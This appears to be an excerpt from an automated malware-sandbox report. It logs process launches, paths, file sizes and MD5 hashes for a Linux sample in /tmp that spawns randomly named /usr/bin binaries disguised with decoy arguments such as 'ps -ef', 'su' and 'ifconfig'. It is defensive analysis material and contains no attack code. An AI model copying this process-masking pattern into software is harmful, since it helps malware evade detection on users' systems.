                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:/usr/bin/yklepkdsai "ps -ef" 9452
                                                        File size:548682 bytes
                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:/usr/bin/yklepkdsai "cat resolv.conf" 9452
                                                        File size:548682 bytes
                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:/usr/bin/yklepkdsai who 9452
                                                        File size:548682 bytes
                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:/usr/bin/gacoxqlwsi su 9452
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:/usr/bin/gacoxqlwsi ifconfig 9452
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:/usr/bin/gacoxqlwsi "ls -la" 9452
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:/usr/bin/gacoxqlwsi "ifconfig eth0" 9452
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:/usr/bin/gacoxqlwsi ls 9452
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517

                                                        Start time:19:55:54
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/gacoxqlwsi
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:bff7bbe7deccd699fdb646a66fe06517